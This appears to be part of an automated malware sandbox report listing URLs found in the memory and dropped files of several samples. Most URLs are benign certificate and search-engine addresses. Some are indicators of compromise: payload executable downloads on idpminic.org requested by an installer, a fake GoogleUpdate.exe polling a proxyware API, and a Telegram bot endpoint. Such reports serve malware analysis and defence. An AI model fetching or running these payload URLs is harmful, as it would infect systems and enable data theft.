Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.452276818.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.451368940.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.450781362.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.451852459.0000000000A08000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000015.00000003.452301546.0000000007741000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0L
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: powershell.exe, 0000003A.00000002.572749249.000001ACD5621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: OBH7JYJN.exe, 00000004.00000002.450413724.0000000001D3B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: Installer.exe, 00000000.00000002.471990125.0000000004790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/f429fjd4uf84u.exe
Source: Installer.exe, 00000000.00000002.471990125.0000000004790000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/hiuhehufw.exe
Source: Installer.exe, 00000000.00000002.469744760.0000000004720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/hiuhehufw.exe%
Source: Installer.exe, 00000000.00000002.469744760.0000000004720000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/hiuhehufw.exe1
Source: Installer.exe, 00000000.00000002.470899679.000000000475F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/ofg7d45fsdfgg312.exe
Source: Installer.exe, 00000000.00000002.470899679.000000000475F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.idpminic.org/aula/ofg7d45fsdfgg312.exel
Source: powershell.exe, 00000009.00000003.448630063.000001D4E3943000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000003.446258088.000001D4E3943000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.
Source: sqlite3.dll.0.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: uHCH8yr185HV.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.452830772.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/
Source: GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/$
Source: GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/-
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/;
Source: GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/I
Source: GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/L
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/My
Source: GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get#z1
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get0
Source: GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get4
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get4z
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get9z
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/get?
Source: GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getC
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getE
Source: GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.498202955.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getF
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getV
Source: GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getb
Source: GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/geti
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getl
Source: GoogleUpdate.exe, 00000022.00000002.642565365.0000000000A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/gett
Source: GoogleUpdate.exe, 00000022.00000002.633531993.00000000009E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/api/proxy/nodes/getuz
Source: GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/h
Source: GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/hy
Source: GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/hy$
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000002.635713610.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.500075907.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.494636129.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/l
Source: GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/l2
Source: GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/lU
Source: GoogleUpdate.exe, 00000022.00000003.538069535.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.550388370.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.545946111.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.542977658.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.555177776.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/la
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/lg
Source: GoogleUpdate.exe, 00000022.00000003.488015285.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/ll
Source: GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/ll;
Source: GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/llZ
Source: GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/llg
Source: GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/lq
Source: GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/oft
Source: GoogleUpdate.exe, 00000022.00000003.472841393.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/p
Source: GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/q
Source: GoogleUpdate.exe, 00000022.00000003.508678490.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.577892980.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.575103795.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.569372326.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.572523796.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.562470229.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/r2profit.com/
Source: GoogleUpdate.exe, 00000022.00000003.452830772.00000000009CF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/t
Source: GoogleUpdate.exe, 00000022.00000003.458747418.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.456827596.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.461540880.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.468076833.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.463095135.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.466378251.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.460081266.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.454959829.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.464619971.0000000000A06000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 00000022.00000003.469854781.0000000000A06000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.peer2profit.com/vc6
Source: NtjHIfvQ.exe, 00000026.00000000.418888159.0000000000AC2000.00000002.00000001.01000000.0000000F.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: uHCH8yr185HV.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: uHCH8yr185HV.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: uHCH8yr185HV.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 0000003A.00000002.589046846.000001ACD5829000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: softokn3.dll.0.dr, freebl3.dll.0.dr, nss3.dll.0.dr	String found in binary or memory: https://mozilla.org0
Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: Installer.exe, 00000000.00000003.345773306.000000000474E000.00000004.00000800.00020000.00000000.sdmp, uHCH8yr185HV.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
